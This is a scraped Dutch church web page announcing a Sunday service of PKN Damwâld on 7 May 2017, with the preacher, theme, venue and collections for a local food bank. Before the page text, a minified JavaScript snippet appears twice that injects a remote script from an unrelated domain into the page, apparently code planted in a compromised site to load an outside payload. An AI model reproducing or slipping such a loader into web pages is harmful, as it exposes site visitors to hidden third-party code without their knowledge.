;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 7 mei 2017 9:30 uur - PKN Damwâld
zondag 7 mei 2017
09:30 uur

Kerkdienst zondag 7 mei 2017 9:30 uur

Thema: "hoe wordt ik een blije christen?"

Informatie

Voorganger:Ds. S. Boukes
Organist:m.m.v. gospelband SIGN
Thema:"hoe wordt ik een blije christen?"
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Voedselbank Dantumadiel

De vandaag te houden collecte is bestemd voor financiële ondersteuning van de eind 2011 van start gegane voedselbank Dantumadiel. Het doel van de voedselbank is: voedselhulp bieden aan mensen die het tijdelijk heel moeilijk hebben; verspilling van voedsel tegengaan, jaarlijks wordt er in Nederland een vijfde deel (20%) van ons voedsel weggegooid; verwijsfunctie naar officiële instellingen, velen weten de weg nog niet te vinden naar allerlei hulpverlenende instanties.

Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Onderhoud en inventaris